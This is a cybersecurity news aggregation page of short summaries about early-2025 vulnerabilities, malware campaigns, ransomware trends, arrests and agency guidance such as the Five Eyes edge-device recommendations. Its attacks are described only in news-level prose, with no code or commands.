Multiple external config control vulnerabilities exists in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `open_port` POST parameter.

Security News

The latest news for cybersecurity collected from vast security websites.

On Thursday February 6th, we experienced an outage with our object storage service (R2) and products that rely on it. Here''s what happened and what we''re doing to fix this going forward.

by Cloudflare

Ya-moon, S. Korea’s notorious sex crime hub operating since 1990, hacked; user data leaked, exposing CSAM, exploitation, and illicit activities.

by Hackread

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Outlook, Sophos XG Firewall, and other flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The vulnerability CVE-2024-21413 (CVSS score of 9.8) is a Remote Code Execution flaw in Microsoft Outlook. […]

by Security Affairs

Rep. Josh Gottheimer (D-N.J.) called the emergence of DeepSeek''s AI tools ""a five alarm national security fire.”

by The Record

Cyble researchers have discovered a sophisticated malware attack that uses dual injection techniques to bypass Google Chrome’s App-Bound Encryption. Chrome App-Bound Encryption was introduced last year to protect cookies from infostealer malware, so attacks that bypass that protection could potentially access user accounts and other sensitive information. In a blog post this week, Cyble researchers detailed the sophisticated attack, which hides a malicious LNK file in a ZIP file – disguised as a PDF – and also makes a malicious XML project look like a PNG to trick users into opening it. “This attack leverages fileless execution, scheduled task persistence, and Telegram-based communication to evade detection while stealing sensitive data,” the researchers wrote. “By exploiting MSBuild.exe and using a double injection technique, the malware executes directly in memory, making it harder to detect. Its ability to bypass Chrome’s Application-Bound Encryption and extract credentials further strengthens its impact.” Sophisticated Chrome App-Bound Encryption Bypass Detailed The Cyble researchers said the file names suggest that the malware is “likely targeting organizations in Vietnam, particularly in the Telemarketing or Sales sectors.” It’s not clear how the malware was initially delivered. The researchers provided an in-depth analysis of the infection chain, which includes an LNK file that creates a scheduled task that runs every 15 minutes, using Microsoft Build Engine to deploy malicious C# code. The shortcut file copies an XML project file to the Temp directory and initiates a command to create the scheduled task, which launches MSBuild.exe to execute embedded C# code from the XML file. “The malicious code operates within the MSBuild.exe process, deploying different components based on the system’s architecture,” the researchers wrote. The double injection technique used by the malware — Process Injection and Reflective DLL Injection — allows it ""to stealthily execute malicious code in memory without leaving traces on the disk, making it harder for traditional security solutions to detect."" Telegram Web API Used for Command and Control The malware uses the Telegram Web API to establish command and control communications with the threat actor (TA), and the malware “enables the TA to change the Telegram bot ID and chat ID as required, offering flexibility in controlling their communication channels.” “The use of Telegram Web API for exfiltration and dynamic bot ID switching ensures continued control over infected systems,” the researchers said. The threat actor can use that connection to issue a range of commands, such as bypassing Chrome App-Bound Encryption to steal an encryption key, deploying a custom info stealer, and exfiltrating sensitive user data from the Chrome browser, including cookies and login data. To prevent falling victim to such attacks, Cyble recommended that organizations engage in user training, implement strict email attachment filtering and application whitelisting, and limit file execution paths and extensions, among other defensive steps. The full Cyble blog includes in-depth analysis of the infection chain, communications and exfiltration, Indicators of Compromise (IoCs), and MITRE ATT&CK Techniques.

by The Cyber Express

OpenAI''s latest tech can reason better than its previous models could, but not well enough to ferret out careful social engineering.

by Dark Reading

A federal judge on Wednesday ruled that a lawsuit challenging a Virginia city’s use of automatic license plate readers can move forward.

by The Record

While President Trump supported federal space efforts during his first administration, the addition of SpaceX chief Elon Musk to his circle likely means challenges for regulating spacecraft cybersecurity, experts say.

by Dark Reading

New mobile apps from the Chinese artificial intelligence (AI) company DeepSeek have remained among the top three ""free"" downloads for Apple and Google devices since their debut on Jan. 25, 2025. But experts caution that many of DeepSeek''s design choices -- such as using hard-coded encryption keys, and sending unencrypted user and device data to Chinese companies -- introduce a number of glaring security and privacy risks.

by Krebs on Security

Riding the wave of notoriety from the Chinese company''s R1 AT chatbot, attackers are spinning up lookalike sites for different malicious use cases.

by Dark Reading

CISA and the FDA are warning that Contec CMS8000 and Epsimed MN-120 patient monitors are open to meddling and data theft; Claroty Team82 flagged the vulnerability as an avoidable insecure design issue.

by Dark Reading

A bipartisan duo in the the U.S. House is proposing legislation to ban the Chinese artificial intelligence app DeepSeek from federal devices. The post House Lawmakers Push to Ban AI App DeepSeek From US Government Devices appeared first on SecurityWeek.

by SecurityWeek

Bogus websites advertising Google Chrome have been used to distribute malicious installers for a remote access trojan called ValleyRAT. The malware, first detected in 2023, is attributed to a threat actor tracked as Silver Fox, with prior attack campaigns primarily targeting Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China. ""This actor has increasingly targeted key roles

by The Hacker News

Ransomware attacks netted cybercrime groups a total of $813.5 million in 2024, a decline from $1.25 billion in 2023. The total amount extorted during the first half of 2024 stood at $459.8 million, blockchain intelligence firm Chainalysis said, adding payment activity slumped after July 2024 by about 3.94%. ""The number of ransomware events increased into H2, but on-chain payments declined,

by The Hacker News

Thorsten examines last year’s CVE list and compares it to recent Talos Incident Response trends. Plus, get all the details on the new vulnerabilities disclosed by Talos’ Vulnerability Research Team.

by Cisco Talos Blog

Zimperium warns that threat actors have stolen the information of tens of thousands of Android users in India using over 1,000 malicious applications. The post 1,000 Apps Used in Malicious Campaign Targeting Android Users in India appeared first on SecurityWeek.

by SecurityWeek

The North Korean APT group has leveraged a custom RDP Wrapper and new malware called forceCopy in recent campaigns.

by SC Media

Discover how RansomHub is rising in the ransomware landscape, using tools like Atera and Splashtop, reconnaissance tactics, and double extortion techniques.

by Darktrace

Following allegations of potential abuse, Paragon Solutions has cut off Italy from its spyware systems. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Reimagining your SOC Part 3/3: This blog explores the challenges security professionals face in managing cyber risk, evaluates current market solutions, and outlines strategies for building a proactive security posture.

by Darktrace

A Chinese national is facing multiple charges of economic espionage and theft of trade secrets after he was accused of stealing AI technology from Google

by SC Media

This article was originally published in the SOC Issue of our PROMPT# zine, which you can read for free HERE. The information was adapted from the 2018 webcast “John Strand’s […] The post John Strand’s 5 Phase Plan For Starting in Computer Security appeared first on Black Hills Information Security.

by Black Hills Information Security

News about USPS suspending shipments from China and Hong Kong may give scammers some ideas to defraud consumers

by Malwarebytes Labs

Barracuda''s flexible deployment options ensure that businesses of all sizes and industries can implement advanced email security in a way that aligns with their operational requirements, technical expertise, and existing infrastructure.

by Barracuda

Cybersecurity compliance goes beyond just meeting regulations. The point of security standards, like those from the National Institute of Standards and Technology (NIST), is to continuously defend your organization and customers against evolving threats. The NIST Cybersecurity Framework provides essential guidelines to help you manage risks and protect sensitive data effectively. Staying compliant should be a bonus to safeguarding your data.

by Legit Security

Imagine a thief silently slipping into your home and copying your keys so they can get back in. They don’t steal anything on their first visit, so you don’t even realize they were there. This is essentially what happens with credential harvesting, a cybercrime where attackers steal usernames and passwords to access sensitive systems or data.

by Legit Security

A new malware campaign dubbed SparkCat has leveraged a suit of bogus apps on both Apple''s and Google''s respective app stores to steal victims'' mnemonic phrases associated with cryptocurrency wallets.  The attacks leverage an optical character recognition (OCR) model to exfiltrate select images containing wallet recovery phrases from photo libraries to a command-and-control (C2) server,

by The Hacker News

All but two Department of Government Efficiency staffers are temporarily stopped from accessing Treasury payment systems.

by The Record

Privileged Access Management (PAM) has emerged as a cornerstone of modern cybersecurity strategies, shifting from a technical necessity to a critical pillar in leadership agendas. With the PAM market projected to reach $42.96 billion by 2037 (according to Research Nester), organizations invest heavily in PAM solutions. Why is PAM climbing the ranks of leadership priorities? While Gartner

by The Hacker News

The North Korea-linked nation-state hacking group known as Kimsuky has been observed conducting spear-phishing attacks to deliver an information stealer malware named forceCopy, according to new findings from the AhnLab Security Intelligence Center (ASEC). The attacks commence with phishing emails containing a Windows shortcut (LNK) file that''s disguised as a Microsoft Office or PDF document.

by The Hacker News

You arrive at the office, power up your system, and panic sets in. Every file is locked, and every system is frozen. A ransom demand flashes on your screen: ""Pay $2 million in Bitcoin within 48 hours or lose everything."" And the worst part is that even after paying, there’s no guarantee you’ll get your data back. Many victims hand over the money, only to receive nothing in return, or worse, get

by The Hacker News

Spring Boot is a powerful framework that makes it easy to develop Java applications. However, security is a crucial aspect that must be…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

This is how I hacked underpass machine easily and how can you do that yourselfContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

This is a TryHackMe walkthrough on the newly released Intro to Docker room that you can find here. I will try my best to keep it clear and…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Hey everyone!Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

👉Free Link: Click HereContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Russian intelligence services are using messaging apps and online forums to recruit Ukrainian citizens for terrorist attacks, promising quick payoffs, according to Ukraine’s law enforcement.

by The Record

DeepSeek-R1 LLM fails 58% of jailbreak attacks in Qualys security analysis. Learn about the vulnerabilities, compliance concerns, and risks for enterprise adoption.

by Hackread

The fixes secure several WiFi 6 access points and Nighthawk Pro Gaming routers from two critical bugs.

by ZDNET Security

Microsoft warns that attackers are deploying malware in ViewState code injection attacks using static ASP. NET machine keys found online. [...]

by BleepingComputer

Flaw could let attackers escalate privileges on popular Google Android and Pixel devices.

by SC Media

The company has upped its reward for red-teaming Constitutional Classifiers. Here''s how to try.

by ZDNET Security

For the second time in nine days, a prominent U.K. engineering company reported a cyber incident. Birmingham-based IMI says it is responding to ""unauthorised access.""

by The Record

Cisco addressed critical flaws in Identity Services Engine, preventing privilege escalation and system configuration changes. Cisco addressed multiple vulnerabilities, including two critical remote code execution flaws, tracked as CVE-2025-20124 (CVSS score of 9.9) and CVE-2025-20125 (CVSS score of 9.1), in Identity Services Engine (ISE). A remote attacker authenticated with read-only administrative privileges could exploit the […]

by Security Affairs

Trying to break through to a broader international audience, Press TV turns to the social platforms Telegram and Rumble The post Iran’s Press TV in the foreign influence wilderness appeared first on DFRLab.

by DFRLab

Here''s what happened, what Grubhub has done about it, and what you should do too.

by ZDNET Security

When it comes to protecting your company from cyberattacks, you don''t have to be the fastest gazelle — you just can''t afford to be the slowest.

by Dark Reading

We tested the best Bluetooth trackers (including AirTags and Tile trackers) to keep tabs on your belongings, whether you use iOS or Android.

by ZDNET Security

Expel announced expanded security information and event management (SIEM) coverage, including a new low-cost data lake offering, allowing customers to meet compliance and data storage requirements more effectively while strengthening their overall security posture. Additionally, Expel extended integration coverage and support for several industry-leading SIEM and extended detection and response (XDR) products, including Sumo Logic Cloud SIEM and CrowdStrike Falcon LogScale environments. “Organizations are navigating an increasingly complex landscape when it comes to the balance … More → The post Expel expands SIEM capabilities to meet mounting data storage needs appeared first on Help Net Security.

by Help Net Security

UPDATED Feb. 5, 2025 — As COVID-19 drove everyone online, tech companies hired like crazy. Call it the COVID Tech Bubble. Now we are hitting the COVID tech bust as tech giants shed jobs by the thousands. Check back regularly for updates to our IT job layoffs tracker.

by ITPro Today

A KnowBe4 Threat Lab publicationAuthors: Daniel Netto, Jeewan Singh Jalal, Anand Bodke, and Martin Kraemer

by KnowBe4

The rise of agentic AI tools will transform the cybercrime landscape, according to a new report from Malwarebytes.

by KnowBe4

In cybersecurity, too often, the emphasis is placed on advanced technology meant to shield digital infrastructure from external threats. Yet, an equally crucial — and underestimated — factor lies at the heart of all digital interactions: the human mind. Behind every breach is a calculated manipulation, and behind every defense, a strategic response. The psychology […] The post Hacking the mind: Why psychology matters to cybersecurity appeared first on Security Intelligence.

by Security Intelligence

The North Korean hacking group known as Kimsuky was observed in recent attacks using a custom-built RDP Wrapper and proxy tools to directly access infected machines. [...]

by BleepingComputer

Workday is laying off 8.5% of its workforce to streamline operations, invest in AI, and drive profitability, joining other major tech firms in workforce reductions.

by ITPro Today

Lynx ransomware, a rebranded and advanced variant of the earlier INC ransomware, has quickly established itself as a significant threat in the cybersecurity landscape. Operating under a Ransomware-as-a-Service (RaaS) model, Lynx employs sophisticated tactics such as double extortion and advanced encryption to target industries across the U.S. and UK. 

by Picus Security

Chainalysis’ latest report on how the ransomware landscape changed from 2023 to 2024 shows a promising trend: An increasing number of victims refuses to pay the ransom. The total volume of ransom payments decreased year-over-year by approximately 35%, the blockchain analysis firm says. In 2023, victims delivered $1.25 billion to ransomware attackers and data theft and extortion gangs. In 2024, the number fell to $813.55 million. Ransomware payments vs. data leak site victims, 2024 (Source: … More → The post Ransomware payments plummet as more victims refuse to pay appeared first on Help Net Security.

by Help Net Security

Astra Security and Invary have received new funding to fuel development of their vulnerability scanning and runtime security solutions. The post Astra, Invary Raise Millions for AI-Powered Pentesting, Runtime Security appeared first on SecurityWeek.

by SecurityWeek

ActiveState launched its Vulnerability Management as a Service (VMaas) offering that revolutionizes how organizations manage open source and accelerates secure software delivery. ActiveState’s Vulnerability Management as a Service combines Application Security Posture Management (ASPM) and Intelligent Remediation capabilities with expert guidance. This solution enables DevSecOps teams to not only identify vulnerabilities in open source packages, but also to automatically prioritize, remediate, and deploy fixes into production without breaking changes, ensuring that applications are truly secured. … More → The post ActiveState accelerates secure software delivery appeared first on Help Net Security.

by Help Net Security

Spanish authorities have arrested an individual who allegedly hacked several high-profile organizations, including NATO and the US army. The post Hacker Who Targeted NATO, US Army Arrested in Spain appeared first on SecurityWeek.

by SecurityWeek

CISA warned U.S. federal agencies on Thursday to secure their systems against ongoing attacks targeting a critical Microsoft Outlook remote code execution (RCE) vulnerability. [...]

by BleepingComputer

UAC-0006, a financially motivated threat actor, targets PrivatBank customers with advanced phishing attacks. CloudSEK’s research reveals malicious emails…

by Hackread

Mobile spyware attacks are on the rise globally. That''s why you should treat your phone like a computer, according to this cybersecurity expert.

by ZDNET Security

UK data protection authority confirms it''s received a data breach report from the company © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Cisco has released updates to address two critical security flaws Identity Services Engine (ISE) that could allow remote attackers to execute arbitrary commands and elevate privileges on susceptible devices. The vulnerabilities are listed below - CVE-2025-20124 (CVSS score: 9.9) - An insecure Java deserialization vulnerability in an API of Cisco ISE that could permit an authenticated, remote

by The Hacker News

Corero Network Security announced new advancements in multi-site resiliency and intelligent traffic management, further strengthening its ability to deliver always-on DDoS protection. Designed to mitigate large-scale cyberattacks, operational failures, and data center outages, Corero’s solution eliminates single points of failure by automatically adapting when a security component, data center, or network segment goes offline—ensuring seamless operations without disruption or manual intervention. Modern organizations require continuous availability, but traditional solutions lack resilience in the face of … More → The post Corero Network Security unveils automated DDoS-aware resiliency appeared first on Help Net Security.

by Help Net Security

Quantum computers could soon break today''s strongest encryption, putting sensitive data at risk. Let''s dive deep into what this all means for telecommunications, security, AI, and our future.

by ZDNET Security

Hackers are targeting vulnerable SimpleHelp RMM clients to create administrator accounts, drop backdoors, and potentially lay the groundwork for ransomware attacks. [...]

by BleepingComputer

IMI plc is addressing a cybersecurity breach involving unauthorized access. The company has engaged experts to deal with the issue.

by The Cyber Express

Five Eyes cybersecurity agencies have released guidance on securing edge devices against increasing threats. The post Five Eyes Agencies Release Guidance on Securing Edge Devices appeared first on SecurityWeek.

by SecurityWeek

The Institute for Critical Infrastructure Technology (ICIT) Digital Consolidation Risk and National Security briefing addresses the growing risks associated with IT and cybersecurity consolidation. The briefing showcases the findings and recommendations of ICIT''s six-member Task Force, composed of industry experts and leaders to shape cybersecurity policy for the next Administration. Panel 2: Task Force Panel

by SC Media

The blame of security incidents may be shared—but the burden of response always falls on the security team. Here’s how to prepare for the inevitable. The post Security Teams Pay the Price: The Unfair Reality of Cyber Incidents appeared first on SecurityWeek.

by SecurityWeek

The Institute for Critical Infrastructure Technology (ICIT) Digital Consolidation Risk and National Security briefing addresses the growing risks associated with IT and cybersecurity consolidation. The briefing showcases the findings and recommendations of ICIT''s six-member Task Force, composed of industry experts and leaders to shape cybersecurity policy for the next Administration. Panel 1: Fireside Chat- Digital Consolidation

by SC Media

Overview The Cybersecurity and Infrastructure Security Agency (CISA) released a series of nine Industrial Control Systems (ICS) advisories on February 4, 2025. These CISA ICS advisories provide essential information about vulnerabilities, security risks, and recommended mitigations affecting various industrial control systems and their components. The advisories, which highlight numerous threats across a variety of devices, emphasize the need for vigilance and prompt action to protect critical infrastructure from potential exploits. The nine advisories address flaws found in systems from notable vendors such as Schneider Electric, Rockwell Automation, and AutomationDirect. These vulnerabilities can allow attackers to disrupt operations, gain unauthorized access, or even execute remote code on compromised devices. Details of the Industrial Control Systems Advisories 1. Western Telematic Inc. Vulnerability Advisory Code: ICSA-25-035-01 Vulnerable Products: NPS Series DSM Series CPM Series An authentication bypass vulnerability (CVE-2025-0630) allows an attacker to access and manipulate files on affected devices'' filesystems. This flaw, present in versions of the products running firmware ≤ 6.62, has a CVSS v4 score of 6.0, indicating medium risk. Users are advised to update affected products to firmware versions 8.06 or 4.02 and to change default passwords before deployment. 2. Rockwell Automation Vulnerability Advisory Code: ICSA-25-035-02 Vulnerable Products: 1756-L8zS3 1756-L3zS3 A critical vulnerability in Rockwell''s 1756-L8zS3 and 1756-L3zS3 PLC models (CVE-2025-24478) allows attackers to cause a denial-of-service (DoS) condition through malicious requests. The flaw, rated with a CVSS v4 score of 7.1, is exploitable remotely and requires low attack complexity. Users should update to the latest firmware versions to mitigate the risk. 3. Elber Communications Equipment Vulnerabilities Advisory Code: ICSA-25-035-03 Vulnerable Products: Signum DVB-S/S2 IRD Cleber/3 Broadcast Multi-Purpose Platform Reble610 M/ODU XPIC IP-ASI-SDH ESE DVB-S/S2 Satellite Receiver Wayber Analog/Digital Audio STL Elber''s devices are plagued by authentication bypass (CVE-2025-0674) and hidden functionality vulnerabilities (CVE-2025-0675). Exploiting these flaws allows attackers unauthorized administrative access. The vulnerabilities, which carry high CVSS v4 scores of 9.3 and 8.7, affect several products with versions that are either obsolete or at the end of their lifecycle. Users are urged to contact Elber for guidance. 4. Schneider Electric Modicon M580 PLCs and EVLink Pro AC Vulnerability Advisory Code: ICSA-25-035-04 Vulnerable Products: Modicon M580 PLCs BMENOR2200H EVLink Pro AC This vulnerability (CVE-2024-11425) affects Schneider Electric’s Modicon M580 PLCs, BMENOR2200H, and EVLink Pro AC products, and can lead to a denial-of-service (DoS) condition via improper buffer size calculations. With a CVSS v4 score of 8.7, this flaw is exploitable remotely and requires low attack complexity. Users should update the affected products to newer firmware versions to mitigate risks. 5. Schneider Electric Web Designer for Modicon Vulnerability Advisory Code: ICSA-25-035-05 Vulnerable Products: Web Designer for Modicon This vulnerability (CVE-2024-12476) within Schneider Electric''s Web Designer for Modicon could allow an attacker to execute arbitrary code or cause information disclosure. With a CVSS v3 score of 7.8, this flaw affects all versions of Web Designer. Mitigation measures include encrypting project files, restricting access to trusted users, and using secure communication protocols when transferring files. 6. Schneider Electric Pro-face GP-Pro EX and Remote HMI Vulnerability Advisory Code: ICSA-25-035-07 Vulnerable Products: Pro-face GP-Pro EX Pro-face Remote HMI Schneider Electric’s Pro-face GP-Pro EX and Remote HMI systems suffer from improper enforcement of message integrity during transmission, which could allow for man-in-the-middle (MITM) attacks. This vulnerability (CVE-2024-12399) has a CVSS v4 score of 6.1. To mitigate this, Schneider Electric recommends the use of secure VPNs like Pro-face Connect to encrypt remote communications. 7. AutomationDirect C-more EA9 HMI Vulnerability Advisory Code: ICSA-25-035-08 Vulnerable Products: C-more EA9 HMI (Multiple Models) A classic buffer overflow vulnerability (CVE-2025-0960) in AutomationDirect’s C-more EA9 HMI devices allows remote code execution or DoS attacks. With a CVSS v4 score of 9.3, this critical flaw affects multiple models. AutomationDirect recommends updating to version 6.80 of the C-more EA9 HMI software or isolating the devices from external networks as an interim mitigation measure. 8. Ashlar-Vellum Cobalt, Graphite, Xenon, Argon, and Lithium Vulnerabilities (Update A) Advisory Code: ICSA-23-299-03 Vulnerable Products: Cobalt Graphite Xenon Argon Lithium Several vulnerabilities, including out-of-bounds write, heap-based buffer overflow, and out-of-bounds read issues, were discovered in Ashlar-Vellum’s Cobalt, Graphite, Xenon, Argon, and Lithium product lines. These vulnerabilities, with CVSS v4 scores of 8.4, could allow attackers to execute arbitrary code. Users should update to the latest software versions to mitigate these risks. Mitigation and Recommendations Update Firmware and Software: Regularly update both firmware and software to the latest versions to ensure that all known vulnerabilities are patched, and that the system has the latest security improvements. Apply Security Patches: Promptly apply all security patches issued by vendors for both hardware and software components. Implement Secure Access Controls: Use multi-factor authentication (MFA) to enhance user verification processes. Use VPNs and Secure Protocols for Remote Communications: Require the use of Virtual Private Networks (VPNs) to encrypt remote connections, ensuring that communications between remote users and the industrial control system are secure. Apply Secure Configurations to Systems: Regularly audit system configurations to ensure compliance with security best practices, such as those outlined by industry standards (e.g., NIST, CIS). Contact Vendor for End-of-Life Devices: For devices approaching end-of-life (EOL), reach out to the manufacturer or vendor to seek guidance on continued support options, updates, and any potential mitigation strategies available. Conclusion CISA''s recent release of nine critical advisories highlights vulnerabilities in Industrial Control Systems (ICS) that could jeopardize critical infrastructure. These vulnerabilities, affecting products from major vendors, emphasize the need for immediate action to secure systems. Organizations must implement key mitigation strategies, including firmware updates, applying patches, and secure communications. Cyble enhances this effort with AI-driven cybersecurity solutions like Cyble Vision and Cyble Hawk, offering real-time threat intelligence to help organizations stay ahead of cyber threats. By combining CISA''s recommendations with Cyble’s advanced platforms, organizations can better protect their critical systems from cyber adversaries. The post CISA Issues Nine Critical Industrial Control Systems Advisories, Addressing Vulnerabilities in Key Equipment appeared first on Cyble.

by CYBLE

Cisco has fixed two critical Identity Services Engine (ISE) vulnerabilities that can let attackers with read-only admin privileges bypass authorization and run commands as root. [...]

by BleepingComputer

The SaaS pricing model often excludes small businesses by charging a premium for core security features – that must change.

by SC Media

Critical vulnerabilities in Cisco Identity Services Engine could lead to elevation of privileges and  system configuration modifications. The post Cisco Patches Critical Vulnerabilities in Enterprise Security Product appeared first on SecurityWeek.

by SecurityWeek

The Spanish National Police has arrested a hacker suspected of having breached national and international agencies (including the United Nation’s International Civil Aviation Organization and NATO), Spanish universities and companies, and released stolen data on the dark web. The attacks The National Police began the investigation in February 2024, after a Madrid business association discovered that a hacker boasted on an underground criminal forum that they have information stolen from the association’s website. “Once the … More → The post Suspected NATO, UN, US Army hacker arrested in Spain appeared first on Help Net Security.

by Help Net Security

Container adoption hits 90% as enterprises grapple with the complexity of Kubernetes, a new Nutanix study finds.

by ITPro Today

An ongoing distributed denial of service (DDoS) attack targets Bohemia Interactive''s infrastructure, preventing players of DayZ and Arma Reforger from playing the games online. [...]

by BleepingComputer

Researchers see dozens of fake DeepSeek websites used for credential phishing, cryptocurrency theft, and scams. The post Fake DeepSeek Sites Used for Credential Phishing, Crypto Theft, Scams appeared first on SecurityWeek.

by SecurityWeek

A technical overview of Cisco Talos'' investigations into Google Cloud Platform Cloud Build, and the threat surface posed by the storage permission family.

by Cisco Talos Blog

Leaders have high hopes for autonomous capabilities, but adding the technology will raise the stakes for security and governance.

by Cybersecurity Dive

Multiple aliases have been leveraged by the hacker in conducting intrusions against the United Nations, the International Civil Aviation Organization, the Guardia Civil, and other public and private entities, which had their data stolen and sold in BreachForums, according to the Spanish police.

by SC Media

Overview The rise in cyber threats targeting edge devices has prompted the cybersecurity agencies of the UK, Australia, Canada, New Zealand, and the United States to release new guidelines aimed at strengthening the security of these critical network components. These recommendations urge manufacturers to integrate robust forensic and logging features by default, making it easier to detect and investigate cyber intrusions. As cybercriminals and state-sponsored actors continue to exploit vulnerabilities in edge devices, organizations must adopt these security measures to mitigate risks. “In the face of a relentless wave of intrusions involving network devices globally our new guidance sets what we collectively see as the standard required to meet the contemporary threat,” said NCSC Technical Director Ollie Whitehouse. “In doing so we are giving manufacturers and their customers the tools to ensure products not only defend against cyberattacks but also provide investigative capabilities require post intrusion.” Understanding Edge Device Security Risks Edge devices, including routers, IoT sensors, security cameras, and smart appliances, act as critical gateways between local networks and the internet. These devices are often deployed with minimal security features, making them attractive targets for attackers who exploit vulnerabilities to gain unauthorized access, disrupt services, or maintain persistent access within networks. In recent years, compromised edge devices have been used in distributed denial-of-service (DDoS) attacks, espionage, and as footholds for ransomware campaigns. The absence of comprehensive logging and forensic capabilities has made it difficult for security teams to detect, investigate, and mitigate such threats in real time. Key Security Concerns for Edge Devices'' The newly issued guidelines focus on several critical security issues associated with edge devices: Misconfigurations and Poor Management: Weak configurations, such as open ports, improperly set access controls, and default passwords, leave devices exposed to attacks. Exploitation of Known Vulnerabilities: Unpatched firmware and software provide an entry point for attackers who exploit these weaknesses to gain control over devices. Denial-of-Service (DoS) Attacks: Edge devices are frequently targeted in distributed denial-of-service (DDoS) attacks that disrupt services by overwhelming devices with malicious traffic. Inadequate Logging and Monitoring: Limited forensic capabilities hinder the ability of security teams to detect and investigate breaches. Weak Authentication Mechanisms: Many devices still rely on single-factor authentication, making them vulnerable to credential-based attacks. Key Recommendations for Securing Edge Devices The newly published guidance sets forth a baseline for device security, ensuring that manufacturers and organizations take proactive steps to enhance the resilience of edge devices against cyber threats. The core aspects of the guidelines include: 1. Mandatory Logging and Forensic Capabilities The ability to track and analyze security events is crucial for identifying and responding to cyber threats. The guidelines recommend that network devices and appliances should log key events related to: Authentication Logs: Devices should record authentication attempts, including usernames, authentication methods (e.g., SSH keys, certificates, MFA), and source IP addresses. Technical Support Interactions: Any vendor-based remote access events should be logged to track support interventions. Application and Service Logs: HTTP/HTTPS requests, command-line interactions, and other service-based activities should be recorded, capturing user sessions, accessed resources, and data transfers. Process Execution Logs: Devices should monitor process creation, termination, and any dynamically loaded modules. File System Activity: Changes to critical directories, configurations, and system binaries should be logged to identify unauthorized modifications. Network Activity Logs: Devices should capture DNS queries, network connections, and packet-processing rules to aid in forensic investigations. Firmware and Software Updates: Logs should document update attempts, versions, error messages, and any integrity verification failures. By ensuring comprehensive logging, organizations can maintain greater situational awareness and rapidly detect anomalous behavior. 2. Secure Logging Practices Logs serve as crucial evidence in cybersecurity investigations, but without proper security measures, they can be altered or deleted by attackers. The guidance outlines best practices such as: Storing logs in a format compatible with forensic analysis tools Using coordinated universal time (UTC) timestamps in ISO 8601 format Running network time protocol (NTP) services for accurate time synchronization Implementing log integrity protections and alerting mechanisms for unusual log tampering By implementing these measures, organizations can ensure that logging mechanisms support effective incident response. 3. Remote Logging and Event Push Support To prevent attackers from deleting local logs, the guidelines advocate for real-time log transfer using encrypted protocols. Devices should: Support standardized log formats that third-party platforms can process Use TLS encryption to secure log transmission Maintain periodic ""heartbeat"" messages to confirm operational status Warn administrators when remote logging is disabled or misconfigured This approach strengthens the ability to detect and investigate cyber incidents even when attackers attempt to cover their tracks. 4. Volatile and Non-Volatile Data Collection Forensic investigations often require both volatile (real-time system state) and non-volatile (long-term storage) data. The guidance recommends that devices should be able to collect: Process activity and parent-child relationships Open network connections, including IP addresses and ports Firewall and packet processing rules Kernel memory maps and dynamically loaded modules Address Resolution Protocol (ARP) and DHCP lease tables Additionally, non-volatile storage should support full data collection, with decryption capabilities provided to system owners. Secure boot processes, Trusted Platform Modules (TPM), and strict access controls should be implemented to prevent unauthorized data extraction. Why These Guidelines Matter Manufacturers play a crucial role in implementing these guidelines by designing devices that are secure by default. By integrating advanced logging, forensic tools, and security controls at the hardware and firmware levels, they can reduce the risk of exploitation. By defining clear security and forensic standards, these guidelines offer significant benefits for both manufacturers and organizations: Improved Threat Detection: Comprehensive logging and monitoring provide network defenders with better visibility into suspicious activity. Faster Incident Response: Secure forensic capabilities enable quicker identification and mitigation of security breaches. Enhanced Accountability: Mandatory audit trails make it easier to track changes and identify the origin of cyber incidents. Stronger Compliance: Adhering to these best practices helps organizations meet regulatory requirements for cybersecurity and data protection. The Role of Manufacturers in Strengthening Security Edge device manufacturers play a crucial role in cybersecurity by ensuring their products are secure by design. The guidelines recommend that vendors: Enable Secure Logging by Default: Devices should log security-related events by default, rather than requiring manual configuration. Adopt Secure-by-Design Principles: Manufacturers should integrate security features during the product development phase rather than treating them as afterthoughts. Provide Regular Firmware Updates: Vendors must proactively patch vulnerabilities and offer extended support for their devices. Offer Transparent Security Reporting: Manufacturers should publish security advisories detailing vulnerabilities and recommended mitigations. Conclusion As cyber threats targeting edge devices continue to grow, organizations must prioritize security by implementing the recommendations outlined in these guidelines. By ensuring robust logging, enforcing secure configurations, applying timely updates, and adopting strong authentication measures, businesses can significantly reduce their exposure to cyber risks. Likewise, manufacturers must take responsibility for delivering secure products that empower organizations to defend against sophisticated threats. By fostering collaboration between cybersecurity agencies, manufacturers, and enterprises, the industry can create a more resilient and secure digital ecosystem. Edge devices will remain critical components of modern networks, but with the right security measures in place, organizations can mitigate the risks and enhance their overall cybersecurity posture. References: https://www.ncsc.gov.uk/news/cyber-agencies-unveil-new-guidelines-to-secure-edge-devices-from-increasing-threat https://www.ncsc.gov.uk/guidance/guidance-on-digital-forensics-protective-monitoring https://www.cyber.gc.ca/en/news-events/five-eyes-publish-series-sound-alarm-cyber-security-threats-edge-devices The post Five Eyes Cyber Agencies Share New Security Guidelines for Edge Device Manufacturers appeared first on Cyble.

by CYBLE

Such a vulnerability — which stems from a USB Video Class driver out-of-bounds write issue that could be exploited for privilege escalation — may have been used by forensic data extraction tools, according to the GrapheneOS development team.

by SC Media

Spanish authorities have arrested an 18-year-old hacker known as “Natohub,” accused of breaching multiple high-profile government and military systems, including databases belonging to NATO, the U.S. Army, and Spain''s Ministry of Defense. The hacker, who operated under multiple aliases on dark web forums, carried out at least 40 cyberattacks throughout 2024, targeting both public institutions … The post Police Arrest Hacker Behind Attacks on U.S. and NATO Systems appeared first on CyberInsider.

by Cyber Insider

The Dallas suburb noted in an online notice that the incident resulted in the compromise of names, addresses, Social Security numbers, credit card details, driver''s license numbers, medical insurance data, and financial account details.

by SC Media

